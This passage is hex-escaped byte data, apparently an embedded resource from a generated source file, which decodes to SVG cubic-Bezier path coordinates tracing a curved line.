\x37\x31\x30\x39\x34\x39\x20\x31\x2e\x39\x35\x35\x35\x32\x34\x39\
\x31\x32\x32\x39\x20\x31\x32\x2e\x35\x35\x38\x30\x33\x31\x32\x37\
\x32\x31\x20\x31\x2e\x39\x36\x31\x37\x36\x35\x39\x38\x31\x31\x33\
\x20\x31\x32\x2e\x35\x31\x36\x32\x35\x37\x38\x34\x34\x39\x20\x43\
\x20\x31\x2e\x39\x36\x38\x30\x30\x37\x30\x34\x39\x39\x36\x20\x31\
\x32\x2e\x34\x37\x34\x34\x38\x34\x34\x31\x37\x37\x20\x31\x2e\x39\
\x37\x34\x32\x34\x38\x31\x31\x38\x38\x20\x31\x32\x2e\x34\x33\x32\
\x36\x31\x36\x36\x37\x39\x33\x20\x31\x2e\x39\x38\x30\x34\x38\x39\
\x31\x38\x37\x36\x33\x20\x31\x32\x2e\x33\x39\x30\x36\x38\x37\x34\
\x35\x32\x38\x20\x43\x20\x31\x2e\x39\x38\x36\x37\x33\x30\x32\x35\
\x36\x34\x37\x20\x31\x32\x2e\x33\x34\x38\x37\x35\x38\x32\x32\x36\
\x33\x20\x31\x2e\x39\x39\x32\x39\x37\x31\x33\x32\x35\x33\x31\x20\
\x31\x32\x2e\x33\x30\x36\x37\x36\x37\x31\x34\x35\x20\x31\x2e\x39\
\x39\x39\x32\x31\x32\x33\x39\x34\x31\x34\x20\x31\x32\x2e\x32\x36\
\x34\x37\x34\x36\x39\x33\x33\x20\x43\x20\x32\x2e\x30\x30\x35\x34\
\x35\x33\x34\x36\x32\x39\x38\x20\x31\x32\x2e\x32\x32\x32\x37\x32\
\x36\x37\x32\x31\x20\x32\x2e\x30\x31\x31\x36\x39\x34\x35\x33\x31\
\x38\x31\x20\x31\x32\x2e\x31\x38\x30\x36\x37\x37\x32\x30\x36\x32\
\x20\x32\x2e\x30\x31\x37\x39\x33\x35\x36\x30\x30\x36\x35\x20\x31\
\x32\x2e\x31\x33\x38\x36\x33\x30\x39\x36\x33\x20\x43\x20\x32\x2e\
\x30\x32\x34\x31\x37\x36\x36\x36\x39\x34\x39\x20\x31\x32\x2e\x30\
\x39\x36\x35\x38\x34\x37\x31\x39\x39\x20\x32\x2e\x30\x33\x30\x34\
\x31\x37\x37\x33\x38\x33\x32\x20\x31\x32\x2e\x30\x35\x34\x35\x34\
\x31\x37\x37\x31\x32\x20\x32\x2e\x30\x33\x36\x36\x35\x38\x38\x30\
\x37\x31\x36\x20\x31\x32\x2e\x30\x31\x32\x35\x33\x34\x34\x39\x31\
\x35\x20\x43\x20\x32\x2e\x30\x34\x32\x38\x39\x39\x38\x37\x35\x39\
\x39\x20\x31\x31\x2e\x39\x37\x30\x35\x32\x37\x32\x31\x31\x38\x20\
\x32\x2e\x30\x34\x39\x31\x34\x30\x39\x34\x34\x38\x33\x20\x31\x31\
\x2e\x39\x32\x38\x35\x35\x35\x38\x31\x38\x38\x20\x32\x2e\x30\x35\
\x35\x33\x38\x32\x30\x31\x33\x36\x37\x20\x31\x31\x2e\x38\x38\x36\
\x36\x35\x32\x34\x33\x37\x20\x43\x20\x32\x2e\x30\x36\x31\x36\x32\
\x33\x30\x38\x32\x35\x20\x31\x31\x2e\x38\x34\x34\x37\x34\x39\x30\
\x35\x35\x32\x20\x32\x2e\x30\x36\x37\x38\x36\x34\x31\x35\x31\x33\
\x34\x20\x31\x31\x2e\x38\x30\x32\x39\x31\x34\x30\x39\x36\x39\x20\
\x32\x2e\x30\x37\x34\x31\x30\x35\x32\x32\x30\x31\x38\x20\x31\x31\
\x2e\x37\x36\x31\x31\x37\x39\x33\x38\x36\x37\x20\x43\x20\x32\x2e\
\x30\x38\x30\x33\x34\x36\x32\x38\x39\x30\x31\x20\x31\x31\x2e\x37\
\x31\x39\x34\x34\x34\x36\x37\x36\x36\x20\x32\x2e\x30\x38\x36\x35\
\x38\x37\x33\x35\x37\x38\x35\x20\x31\x31\x2e\x36\x37\x37\x38\x31\
\x30\x38\x32\x30\x38\x20\x32\x2e\x30\x39\x32\x38\x32\x38\x34\x32\
\x36\x36\x38\x20\x31\x31\x2e\x36\x33\x36\x33\x30\x39\x32\x39\x35\
\x34\x20\x43\x20\x32\x2e\x30\x39\x39\x30\x36\x39\x34\x39\x35\x35\
\x32\x20\x31\x31\x2e\x35\x39\x34\x38\x30\x37\x37\x37\x20\x32\x2e\
\x31\x30\x35\x33\x31\x30\x35\x36\x34\x33\x36\x20\x31\x31\x2e\x35\
\x35\x33\x34\x33\x39\x33\x37\x34\x20\x32\x2e\x31\x31\x31\x35\x35\
\x31\x36\x33\x33\x31\x39\x20\x31\x31\x2e\x35\x31\x32\x32\x33\x35\
\x31\x38\x35\x39\x20\x43\x20\x32\x2e\x31\x31\x37\x37\x39\x32\x37\
\x30\x32\x30\x33\x20\x31\x31\x2e\x34\x37\x31\x30\x33\x30\x39\x39\
\x37\x38\x20\x32\x2e\x31\x32\x34\x30\x33\x33\x37\x37\x30\x38\x36\
\x20\x31\x31\x2e\x34\x32\x39\x39\x39\x32\x30\x30\x38\x34\x20\x32\
\x2e\x31\x33\x30\x32\x37\x34\x38\x33\x39\x37\x20\x31\x31\x2e\x33\
\x38\x39\x31\x34\x38\x38\x35\x30\x37\x20\x43\x20\x32\x2e\x31\x33\
\x36\x35\x31\x35\x39\x30\x38\x35\x34\x20\x31\x31\x2e\x33\x34\x38\
\x33\x30\x35\x36\x39\x32\x39\x20\x32\x2e\x31\x34\x32\x37\x35\x36\
\x39\x37\x37\x33\x37\x20\x31\x31\x2e\x33\x30\x37\x36\x35\x39\x35\
\x34\x37\x37\x20\x32\x2e\x31\x34\x38\x39\x39\x38\x30\x34\x36\x32\
\x31\x20\x31\x31\x2e\x32\x36\x37\x32\x34\x30\x35\x35\x35\x32\x20\
\x43\x20\x32\x2e\x31\x35\x35\x32\x33\x39\x31\x31\x35\x30\x34\x20\
\x31\x31\x2e\x32\x32\x36\x38\x32\x31\x35\x36\x32\x36\x20\x32\x2e\
\x31\x36\x31\x34\x38\x30\x31\x38\x33\x38\x38\x20\x31\x31\x2e\x31\
\x38\x36\x36\x33\x31\x30\x39\x32\x20\x32\x2e\x31\x36\x37\x37\x32\
\x31\x32\x35\x32\x37\x32\x20\x31\x31\x2e\x31\x34\x36\x36\x39\x38\
\x37\x34\x33\x39\x20\x43\x20\x32\x2e\x31\x37\x33\x39\x36\x32\x33\
\x32\x31\x35\x35\x20\x31\x31\x2e\x31\x30\x36\x37\x36\x36\x33\x39\
\x35\x38\x20\x32\x2e\x31\x38\x30\x32\x30\x33\x33\x39\x30\x33\x39\
\x20\x31\x31\x2e\x30\x36\x37\x30\x39\x33\x37\x32\x35\x39\x20\x32\
\x2e\x31\x38\x36\x34\x34\x34\x34\x35\x39\x32\x32\x20\x31\x31\x2e\
\x30\x32\x37\x37\x30\x39\x37\x34\x39\x32\x20\x43\x20\x32\x2e\x31\
\x39\x32\x36\x38\x35\x35\x32\x38\x30\x36\x20\x31\x30\x2e\x39\x38\
\x38\x33\x32\x35\x37\x37\x32\x35\x20\x32\x2e\x31\x39\x38\x39\x32\
\x36\x35\x39\x36\x39\x20\x31\x30\x2e\x39\x34\x39\x32\x33\x32\x32\
\x32\x38\x37\x20\x32\x2e\x32\x30\x35\x31\x36\x37\x36\x36\x35\x37\
\x33\x20\x31\x30\x2e\x39\x31\x30\x34\x35\x37\x35\x30\x32\x38\x20\
\x43\x20\x32\x2e\x32\x31\x31\x34\x30\x38\x37\x33\x34\x35\x37\x20\
\x31\x30\x2e\x38\x37\x31\x36\x38\x32\x37\x37\x36\x39\x20\x32\x2e\
\x32\x31\x37\x36\x34\x39\x38\x30\x33\x34\x20\x31\x30\x2e\x38\x33\
\x33\x32\x32\x38\x37\x38\x39\x36\x20\x32\x2e\x32\x32\x33\x38\x39\
\x30\x38\x37\x32\x32\x34\x20\x31\x30\x2e\x37\x39\x35\x31\x32\x33\
\x32\x35\x32\x20\x43\x20\x32\x2e\x32\x33\x30\x31\x33\x31\x39\x34\
\x31\x30\x38\x20\x31\x30\x2e\x37\x35\x37\x30\x31\x37\x37\x31\x34\
\x34\x20\x32\x2e\x32\x33\x36\x33\x37\x33\x30\x30\x39\x39\x31\x20\
\x31\x30\x2e\x37\x31\x39\x32\x36\x32\x37\x32\x35\x34\x20\x32\x2e\
\x32\x34\x32\x36\x31\x34\x30\x37\x38\x37\x35\x20\x31\x30\x2e\x36\
\x38\x31\x38\x38\x35\x32\x37\x39\x33\x20\x43\x20\x32\x2e\x32\x34\
\x38\x38\x35\x35\x31\x34\x37\x35\x38\x20\x31\x30\x2e\x36\x34\x34\
\x35\x30\x37\x38\x33\x33\x31\x20\x32\x2e\x32\x35\x35\x30\x39\x36\
\x32\x31\x36\x34\x32\x20\x31\x30\x2e\x36\x30\x37\x35\x31\x30\x32\
\x30\x33\x37\x20\x32\x2e\x32\x36\x31\x33\x33\x37\x32\x38\x35\x32\
\x36\x20\x31\x30\x2e\x35\x37\x30\x39\x31\x38\x36\x32\x36\x36\x20\
\x43\x20\x32\x2e\x32\x36\x37\x35\x37\x38\x33\x35\x34\x30\x39\x20\
\x31\x30\x2e\x35\x33\x34\x33\x32\x37\x30\x34\x39\x35\x20\x32\x2e\
\x32\x37\x33\x38\x31\x39\x34\x32\x32\x39\x33\x20\x31\x30\x2e\x34\
\x39\x38\x31\x34\x33\x39\x37\x30\x31\x20\x32\x2e\x32\x38\x30\x30\
\x36\x30\x34\x39\x31\x37\x36\x20\x31\x30\x2e\x34\x36\x32\x33\x39\
\x34\x38\x32\x35\x20\x43\x20\x32\x2e\x32\x38\x36\x33\x30\x31\x35\
\x36\x30\x36\x20\x31\x30\x2e\x34\x32\x36\x36\x34\x35\x36\x37\x39\
\x38\x20\x32\x2e\x32\x39\x32\x35\x34\x32\x36\x32\x39\x34\x34\x20\
\x31\x30\x2e\x33\x39\x31\x33\x33\x33\x30\x38\x31\x39\x20\x32\x2e\
\x32\x39\x38\x37\x38\x33\x36\x39\x38\x32\x37\x20\x31\x30\x2e\x33\
\x35\x36\x34\x38\x31\x36\x32\x39\x34\x20\x43\x20\x32\x2e\x33\x30\
\x35\x30\x32\x34\x37\x36\x37\x31\x31\x20\x31\x30\x2e\x33\x32\x31\
\x36\x33\x30\x31\x37\x36\x38\x20\x32\x2e\x33\x31\x31\x32\x36\x35\
\x38\x33\x35\x39\x34\x20\x31\x30\x2e\x32\x38\x37\x32\x34\x32\x36\
\x34\x36\x32\x20\x32\x2e\x33\x31\x37\x35\x30\x36\x39\x30\x34\x37\
\x38\x20\x31\x30\x2e\x32\x35\x33\x33\x34\x32\x37\x35\x39\x32\x20\
\x43\x20\x32\x2e\x33\x32\x33\x37\x34\x37\x39\x37\x33\x36\x32\x20\
\x31\x30\x2e\x32\x31\x39\x34\x34\x32\x38\x37\x32\x33\x20\x32\x2e\
\x33\x32\x39\x39\x38\x39\x30\x34\x32\x34\x35\x20\x31\x30\x2e\x31\
\x38\x36\x30\x33\x33\x35\x36\x34\x39\x20\x32\x2e\x33\x33\x36\x32\
\x33\x30\x31\x31\x31\x32\x39\x20\x31\x30\x2e\x31\x35\x33\x31\x33\
\x37\x36\x34\x35\x35\x20\x43\x20\x32\x2e\x33\x34\x32\x34\x37\x31\
\x31\x38\x30\x31\x33\x20\x31\x30\x2e\x31\x32\x30\x32\x34\x31\x37\
\x32\x36\x32\x20\x32\x2e\x33\x34\x38\x37\x31\x32\x32\x34\x38\x39\
\x36\x20\x31\x30\x2e\x30\x38\x37\x38\x36\x32\x32\x38\x35\x37\x20\
\x32\x2e\x33\x35\x34\x39\x35\x33\x33\x31\x37\x38\x20\x31\x30\x2e\
\x30\x35\x36\x30\x32\x31\x31\x38\x34\x32\x20\x43\x20\x32\x2e\x33\
\x36\x31\x31\x39\x34\x33\x38\x36\x36\x33\x20\x31\x30\x2e\x30\x32\
\x34\x31\x38\x30\x30\x38\x32\x36\x20\x32\x2e\x33\x36\x37\x34\x33\
\x35\x34\x35\x35\x34\x37\x20\x39\x2e\x39\x39\x32\x38\x38\x30\x35\
\x36\x30\x38\x37\x20\x32\x2e\x33\x37\x33\x36\x37\x36\x35\x32\x34\
\x33\x31\x20\x39\x2e\x39\x36\x32\x31\x34\x33\x34\x39\x36\x37\x36\
\x20\x43\x20\x32\x2e\x33\x37\x39\x39\x31\x37\x35\x39\x33\x31\x34\
\x20\x39\x2e\x39\x33\x31\x34\x30\x36\x34\x33\x32\x36\x35\x20\x32\
\x2e\x33\x38\x36\x31\x35\x38\x36\x36\x31\x39\x38\x20\x39\x2e\x39\
\x30\x31\x32\x33\x35\x32\x31\x32\x30\x35\x20\x32\x2e\x33\x39\x32\
\x33\x39\x39\x37\x33\x30\x38\x31\x20\x39\x2e\x38\x37\x31\x36\x34\
\x39\x36\x39\x38\x33\x39\x20\x43\x20\x32\x2e\x33\x39\x38\x36\x34\
\x30\x37\x39\x39\x36\x35\x20\x39\x2e\x38\x34\x32\x30\x36\x34\x31\
\x38\x34\x37\x33\x20\x32\x2e\x34\x30\x34\x38\x38\x31\x38\x36\x38\
\x34\x39\x20\x39\x2e\x38\x31\x33\x30\x36\x37\x39\x30\x33\x36\x34\
\x20\x32\x2e\x34\x31\x31\x31\x32\x32\x39\x33\x37\x33\x32\x20\x39\
\x2e\x37\x38\x34\x36\x37\x39\x36\x37\x33\x33\x39\x20\x43\x20\x32\
\x2e\x34\x31\x37\x33\x36\x34\x30\x30\x36\x31\x36\x20\x39\x2e\x37\
\x35\x36\x32\x39\x31\x34\x34\x33\x31\x34\x20\x32\x2e\x34\x32\x33\
\x36\x30\x35\x30\x37\x34\x39\x39\x20\x39\x2e\x37\x32\x38\x35\x31\
\x34\x39\x32\x33\x36\x39\x20\x32\x2e\x34\x32\x39\x38\x34\x36\x31\
\x34\x33\x38\x33\x20\x39\x2e\x37\x30\x31\x33\x36\x37\x38\x35\x39\
\x30\x37\x20\x43\x20\x32\x2e\x34\x33\x36\x30\x38\x37\x32\x31\x32\
\x36\x37\x20\x39\x2e\x36\x37\x34\x32\x32\x30\x37\x39\x34\x34\x35\
\x20\x32\x2e\x34\x34\x32\x33\x32\x38\x32\x38\x31\x35\x20\x39\x2e\
\x36\x34\x37\x37\x30\x36\x39\x37\x33\x32\x39\x20\x32\x2e\x34\x34\
\x38\x35\x36\x39\x33\x35\x30\x33\x34\x20\x39\x2e\x36\x32\x31\x38\
\x34\x33\x30\x33\x37\x39\x33\x20\x43\x20\x32\x2e\x34\x35\x34\x38\
\x31\x30\x34\x31\x39\x31\x37\x20\x39\x2e\x35\x39\x35\x39\x37\x39\
\x31\x30\x32\x35\x38\x20\x32\x2e\x34\x36\x31\x30\x35\x31\x34\x38\
\x38\x30\x31\x20\x39\x2e\x35\x37\x30\x37\x36\x38\x39\x36\x34\x34\
\x37\x20\x32\x2e\x34\x36\x37\x32\x39\x32\x35\x35\x36\x38\x35\x20\
\x39\x2e\x35\x34\x36\x32\x32\x38\x31\x33\x38\x35\x37\x20\x43\x20\
\x32\x2e\x34\x37\x33\x35\x33\x33\x36\x32\x35\x36\x38\x20\x39\x2e\
\x35\x32\x31\x36\x38\x37\x33\x31\x32\x36\x37\x20\x32\x2e\x34\x37\
\x39\x37\x37\x34\x36\x39\x34\x35\x32\x20\x39\x2e\x34\x39\x37\x38\
\x31\x39\x38\x32\x37\x31\x38\x20\x32\x2e\x34\x38\x36\x30\x31\x35\
\x37\x36\x33\x33\x35\x20\x39\x2e\x34\x37\x34\x36\x34\x30\x30\x34\
\x35\x36\x37\x20\x43\x20\x32\x2e\x34\x39\x32\x32\x35\x36\x38\x33\
\x32\x31\x39\x20\x39\x2e\x34\x35\x31\x34\x36\x30\x32\x36\x34\x31\
\x36\x20\x32\x2e\x34\x39\x38\x34\x39\x37\x39\x30\x31\x30\x33\x20\
\x39\x2e\x34\x32\x38\x39\x37\x32\x33\x32\x35\x33\x38\x20\x32\x2e\
\x35\x30\x34\x37\x33\x38\x39\x36\x39\x38\x36\x20\x39\x2e\x34\x30\
\x37\x31\x38\x39\x34\x31\x39\x33\x32\x20\x43\x20\x32\x2e\x35\x31\
\x30\x39\x38\x30\x30\x33\x38\x37\x20\x39\x2e\x33\x38\x35\x34\x30\
\x36\x35\x31\x33\x32\x36\x20\x32\x2e\x35\x31\x37\x32\x32\x31\x31\
\x30\x37\x35\x33\x20\x39\x2e\x33\x36\x34\x33\x33\x32\x38\x38\x32\
\x38\x31\x20\x32\x2e\x35\x32\x33\x34\x36\x32\x31\x37\x36\x33\x37\
\x20\x39\x2e\x33\x34\x33\x39\x38\x30\x35\x32\x33\x39\x37\x20\x43\
\x20\x32\x2e\x35\x32\x39\x37\x30\x33\x32\x34\x35\x32\x31\x20\x39\
\x2e\x33\x32\x33\x36\x32\x38\x31\x36\x35\x31\x34\x20\x32\x2e\x35\
\x33\x35\x39\x34\x34\x33\x31\x34\x30\x34\x20\x39\x2e\x33\x30\x34\
\x30\x30\x31\x34\x31\x38\x33\x39\x20\x32\x2e\x35\x34\x32\x31\x38\
\x35\x33\x38\x32\x38\x38\x20\x39\x2e\x32\x38\x35\x31\x31\x31\x30\
\x36\x37\x32\x34\x20\x43\x20\x32\x2e\x35\x34\x38\x34\x32\x36\x34\
\x35\x31\x37\x31\x20\x39\x2e\x32\x36\x36\x32\x32\x30\x37\x31\x36\
\x30\x38\x20\x32\x2e\x35\x35\x34\x36\x36\x37\x35\x32\x30\x35\x35\
\x20\x39\x2e\x32\x34\x38\x30\x37\x31\x31\x39\x31\x38\x36\x20\x32\
\x2e\x35\x36\x30\x39\x30\x38\x35\x38\x39\x33\x39\x20\x39\x2e\x32\
\x33\x30\x36\x37\x32\x30\x34\x38\x38\x38\x20\x43\x20\x32\x2e\x35\
\x36\x37\x31\x34\x39\x36\x35\x38\x32\x32\x20\x39\x2e\x32\x31\x33\
\x32\x37\x32\x39\x30\x35\x39\x20\x32\x2e\x35\x37\x33\x33\x39\x30\
\x37\x32\x37\x30\x36\x20\x39\x2e\x31\x39\x36\x36\x32\x38\x36\x35\
\x39\x35\x34\x20\x32\x2e\x35\x37\x39\x36\x33\x31\x37\x39\x35\x38\
\x39\x20\x39\x2e\x31\x38\x30\x37\x34\x37\x36\x32\x30\x31\x34\x20\
\x43\x20\x32\x2e\x35\x38\x35\x38\x37\x32\x38\x36\x34\x37\x33\x20\
\x39\x2e\x31\x36\x34\x38\x36\x36\x35\x38\x30\x37\x35\x20\x32\x2e\
\x35\x39\x32\x31\x31\x33\x39\x33\x33\x35\x37\x20\x39\x2e\x31\x34\
\x39\x37\x35\x33\x33\x34\x30\x37\x34\x20\x32\x2e\x35\x39\x38\x33\
\x35\x35\x30\x30\x32\x34\x20\x39\x2e\x31\x33\x35\x34\x31\x34\x39\
\x35\x33\x36\x36\x20\x43\x20\x32\x2e\x36\x30\x34\x35\x39\x36\x30\
\x37\x31\x32\x34\x20\x39\x2e\x31\x32\x31\x30\x37\x36\x35\x36\x36\
\x35\x39\x20\x32\x2e\x36\x31\x30\x38\x33\x37\x31\x34\x30\x30\x38\
\x20\x39\x2e\x31\x30\x37\x35\x31\x37\x36\x39\x34\x38\x31\x20\x32\
\x2e\x36\x31\x37\x30\x37\x38\x32\x30\x38\x39\x31\x20\x39\x2e\x30\
\x39\x34\x37\x34\x34\x31\x32\x34\x31\x38\x20\x43\x20\x32\x2e\x36\
\x32\x33\x33\x31\x39\x32\x37\x37\x37\x35\x20\x39\x2e\x30\x38\x31\
\x39\x37\x30\x35\x35\x33\x35\x35\x20\x32\x2e\x36\x32\x39\x35\x36\
\x30\x33\x34\x36\x35\x38\x20\x39\x2e\x30\x36\x39\x39\x38\x37\x30\
\x30\x39\x31\x36\x20\x32\x2e\x36\x33\x35\x38\x30\x31\x34\x31\x35\
\x34\x32\x20\x39\x2e\x30\x35\x38\x37\x39\x38\x30\x30\x30\x32\x32\
\x20\x43\x20\x32\x2e\x36\x34\x32\x30\x34\x32\x34\x38\x34\x32\x36\
\x20\x39\x2e\x30\x34\x37\x36\x30\x38\x39\x39\x31\x32\x38\x20\x32\
\x2e\x36\x34\x38\x32\x38\x33\x35\x35\x33\x30\x39\x20\x39\x2e\x30\
\x33\x37\x32\x31\x39\x32\x39\x38\x33\x31\x20\x32\x2e\x36\x35\x34\
\x35\x32\x34\x36\x32\x31\x39\x33\x20\x39\x2e\x30\x32\x37\x36\x33\
\x32\x31\x34\x36\x39\x20\x43\x20\x32\x2e\x36\x36\x30\x37\x36\x35\
\x36\x39\x30\x37\x36\x20\x39\x2e\x30\x31\x38\x30\x34\x34\x39\x39\
\x35\x35\x20\x32\x2e\x36\x36\x37\x30\x30\x36\x37\x35\x39\x36\x20\
\x39\x2e\x30\x30\x39\x32\x36\x35\x32\x31\x34\x32\x33\x20\x32\x2e\
\x36\x37\x33\x32\x34\x37\x38\x32\x38\x34\x34\x20\x39\x2e\x30\x30\
\x31\x32\x39\x34\x37\x34\x30\x30\x37\x20\x43\x20\x32\x2e\x36\x37\
\x39\x34\x38\x38\x38\x39\x37\x32\x37\x20\x38\x2e\x39\x39\x33\x33\
\x32\x34\x32\x36\x35\x39\x32\x20\x32\x2e\x36\x38\x35\x37\x32\x39\
\x39\x36\x36\x31\x31\x20\x38\x2e\x39\x38\x36\x31\x36\x37\x39\x36\
\x38\x30\x33\x20\x32\x2e\x36\x39\x31\x39\x37\x31\x30\x33\x34\x39\
\x34\x20\x38\x2e\x39\x37\x39\x38\x32\x36\x34\x39\x31\x38\x20\x43\
\x20\x32\x2e\x36\x39\x38\x32\x31\x32\x31\x30\x33\x37\x38\x20\x38\
\x2e\x39\x37\x33\x34\x38\x35\x30\x31\x35\x35\x37\x20\x32\x2e\x37\
\x30\x34\x34\x35\x33\x31\x37\x32\x36\x32\x20\x38\x2e\x39\x36\x37\
\x39\x36\x33\x32\x36\x33\x31\x39\x20\x32\x2e\x37\x31\x30\x36\x39\
\x34\x32\x34\x31\x34\x35\x20\x38\x2e\x39\x36\x33\x32\x36\x30\x35\
\x38\x37\x34\x37\x20\x43\x20\x32\x2e\x37\x31\x36\x39\x33\x35\x33\
\x31\x30\x32\x39\x20\x38\x2e\x39\x35\x38\x35\x35\x37\x39\x31\x31\
\x37\x34\x20\x32\x2e\x37\x32\x33\x31\x37\x36\x33\x37\x39\x31\x32\
\x20\x38\x2e\x39\x35\x34\x36\x37\x39\x32\x34\x30\x33\x35\x20\x32\
\x2e\x37\x32\x39\x34\x31\x37\x34\x34\x37\x39\x36\x20\x38\x2e\x39\
\x35\x31\x36\x32\x32\x36\x33\x34\x34\x37\x20\x43\x20\x32\x2e\x37\
\x33\x35\x36\x35\x38\x35\x31\x36\x38\x20\x38\x2e\x39\x34\x38\x35\
\x36\x36\x30\x32\x38\x36\x20\x32\x2e\x37\x34\x31\x38\x39\x39\x35\
\x38\x35\x36\x33\x20\x38\x2e\x39\x34\x36\x33\x33\x36\x34\x33\x33\
\x37\x39\x20\x32\x2e\x37\x34\x38\x31\x34\x30\x36\x35\x34\x34\x37\
\x20\x38\x2e\x39\x34\x34\x39\x33\x30\x36\x32\x32\x36\x34\x20\x43\
\x20\x32\x2e\x37\x35\x34\x33\x38\x31\x37\x32\x33\x33\x20\x38\x2e\
\x39\x34\x33\x35\x32\x34\x38\x31\x31\x34\x38\x20\x32\x2e\x37\x36\
\x30\x36\x32\x32\x37\x39\x32\x31\x34\x20\x38\x2e\x39\x34\x32\x39\
\x34\x37\x37\x33\x39\x37\x34\x20\x32\x2e\x37\x36\x36\x38\x36\x33\
\x38\x36\x30\x39\x38\x20\x38\x2e\x39\x34\x33\x31\x39\x34\x38\x39\
\x36\x33\x39\x20\x43\x20\x32\x2e\x37\x37\x33\x31\x30\x34\x39\x32\
\x39\x38\x31\x20\x38\x2e\x39\x34\x33\x34\x34\x32\x30\x35\x33\x30\
\x35\x20\x32\x2e\x37\x37\x39\x33\x34\x35\x39\x39\x38\x36\x35\x20\
\x38\x2e\x39\x34\x34\x35\x31\x38\x33\x39\x36\x34\x31\x20\x32\x2e\
\x37\x38\x35\x35\x38\x37\x30\x36\x37\x34\x38\x20\x38\x2e\x39\x34\
\x36\x34\x31\x38\x31\x33\x38\x38\x31\x20\x43\x20\x32\x2e\x37\x39\
\x31\x38\x32\x38\x31\x33\x36\x33\x32\x20\x38\x2e\x39\x34\x38\x33\
\x31\x37\x38\x38\x31\x32\x32\x20\x32\x2e\x37\x39\x38\x30\x36\x39\
\x32\x30\x35\x31\x36\x20\x38\x2e\x39\x35\x31\x30\x34\x35\x39\x37\
\x35\x38\x38\x20\x32\x2e\x38\x30\x34\x33\x31\x30\x32\x37\x33\x39\
\x39\x20\x38\x2e\x39\x35\x34\x35\x39\x35\x33\x36\x37\x34\x34\x20\
\x43\x20\x32\x2e\x38\x31\x30\x35\x35\x31\x33\x34\x32\x38\x33\x20\
\x38\x2e\x39\x35\x38\x31\x34\x34\x37\x35\x39\x30\x31\x20\x32\x2e\
\x38\x31\x36\x37\x39\x32\x34\x31\x31\x36\x36\x20\x38\x2e\x39\x36\
\x32\x35\x32\x30\x33\x38\x37\x39\x31\x20\x32\x2e\x38\x32\x33\x30\
\x33\x33\x34\x38\x30\x35\x20\x38\x2e\x39\x36\x37\x37\x31\x33\x39\
\x34\x32\x30\x31\x20\x43\x20\x32\x2e\x38\x32\x39\x32\x37\x34\x35\
\x34\x39\x33\x34\x20\x38\x2e\x39\x37\x32\x39\x30\x37\x34\x39\x36\
\x31\x32\x20\x32\x2e\x38\x33\x35\x35\x31\x35\x36\x31\x38\x31\x37\
\x20\x38\x2e\x39\x37\x38\x39\x32\x33\x38\x39\x35\x34\x36\x20\x32\
\x2e\x38\x34\x31\x37\x35\x36\x36\x38\x37\x30\x31\x20\x38\x2e\x39\
\x38\x35\x37\x35\x33\x35\x38\x33\x39\x37\x20\x43\x20\x32\x2e\x38\
\x34\x37\x39\x39\x37\x37\x35\x35\x38\x34\x20\x38\x2e\x39\x39\x32\
\x35\x38\x33\x32\x37\x32\x34\x38\x20\x32\x2e\x38\x35\x34\x32\x33\
\x38\x38\x32\x34\x36\x38\x20\x39\x2e\x30\x30\x30\x32\x33\x31\x31\
\x34\x32\x31\x38\x20\x32\x2e\x38\x36\x30\x34\x37\x39\x38\x39\x33\
\x35\x32\x20\x39\x2e\x30\x30\x38\x36\x38\x36\x34\x30\x37\x38\x34\
\x20\x43\x20\x32\x2e\x38\x36\x36\x37\x32\x30\x39\x36\x32\x33\x35\
\x20\x39\x2e\x30\x31\x37\x31\x34\x31\x36\x37\x33\x35\x20\x32\x2e\
\x38\x37\x32\x39\x36\x32\x30\x33\x31\x31\x39\x20\x39\x2e\x30\x32\
\x36\x34\x30\x39\x31\x39\x31\x35\x36\x20\x32\x2e\x38\x37\x39\x32\
\x30\x33\x31\x30\x30\x30\x33\x20\x39\x2e\x30\x33\x36\x34\x37\x36\
\x39\x36\x34\x33\x20\x43\x20\x32\x2e\x38\x38\x35\x34\x34\x34\x31\
\x36\x38\x38\x36\x20\x39\x2e\x30\x34\x36\x35\x34\x34\x37\x33\x37\
\x30\x35\x20\x32\x2e\x38\x39\x31\x36\x38\x35\x32\x33\x37\x37\x20\
\x39\x2e\x30\x35\x37\x34\x31\x37\x35\x37\x37\x38\x35\x20\x32\x2e\
\x38\x39\x37\x39\x32\x36\x33\x30\x36\x35\x33\x20\x39\x2e\x30\x36\
\x39\x30\x38\x32\x32\x39\x35\x30\x33\x20\x43\x20\x32\x2e\x39\x30\
\x34\x31\x36\x37\x33\x37\x35\x33\x37\x20\x39\x2e\x30\x38\x30\x37\
\x34\x37\x30\x31\x32\x32\x31\x20\x32\x2e\x39\x31\x30\x34\x30\x38\
\x34\x34\x34\x32\x31\x20\x39\x2e\x30\x39\x33\x32\x30\x38\x33\x36\
\x38\x36\x33\x20\x32\x2e\x39\x31\x36\x36\x34\x39\x35\x31\x33\x30\
\x34\x20\x39\x2e\x31\x30\x36\x34\x35\x31\x39\x39\x39\x30\x35\x20\
\x43\x20\x32\x2e\x39\x32\x32\x38\x39\x30\x35\x38\x31\x38\x38\x20\
\x39\x2e\x31\x31\x39\x36\x39\x35\x36\x32\x39\x34\x38\x20\x32\x2e\
\x39\x32\x39\x31\x33\x31\x36\x35\x30\x37\x31\x20\x39\x2e\x31\x33\
\x33\x37\x32\x36\x32\x33\x38\x38\x38\x20\x32\x2e\x39\x33\x35\x33\
\x37\x32\x37\x31\x39\x35\x35\x20\x39\x2e\x31\x34\x38\x35\x32\x38\
\x33\x31\x30\x36\x39\x20\x43\x20\x32\x2e\x39\x34\x31\x36\x31\x33\
\x37\x38\x38\x33\x39\x20\x39\x2e\x31\x36\x33\x33\x33\x30\x33\x38\
\x32\x35\x20\x32\x2e\x39\x34\x37\x38\x35\x34\x38\x35\x37\x32\x32\
\x20\x39\x2e\x31\x37\x38\x39\x30\x38\x35\x35\x36\x35\x33\x20\x32\
\x2e\x39\x35\x34\x30\x39\x35\x39\x32\x36\x30\x36\x20\x39\x2e\x31\
\x39\x35\x32\x34\x36\x31\x38\x38\x38\x34\x20\x43\x20\x32\x2e\x39\
\x36\x30\x33\x33\x36\x39\x39\x34\x38\x39\x20\x39\x2e\x32\x31\x31\
\x35\x38\x33\x38\x32\x31\x31\x36\x20\x32\x2e\x39\x36\x36\x35\x37\
\x38\x30\x36\x33\x37\x33\x20\x39\x2e\x32\x32\x38\x36\x38\x35\x34\
\x37\x39\x32\x34\x20\x32\x2e\x39\x37\x32\x38\x31\x39\x31\x33\x32\
\x35\x37\x20\x39\x2e\x32\x34\x36\x35\x33\x33\x34\x31\x37\x35\x32\
\x20\x43\x20\x32\x2e\x39\x37\x39\x30\x36\x30\x32\x30\x31\x34\x20\
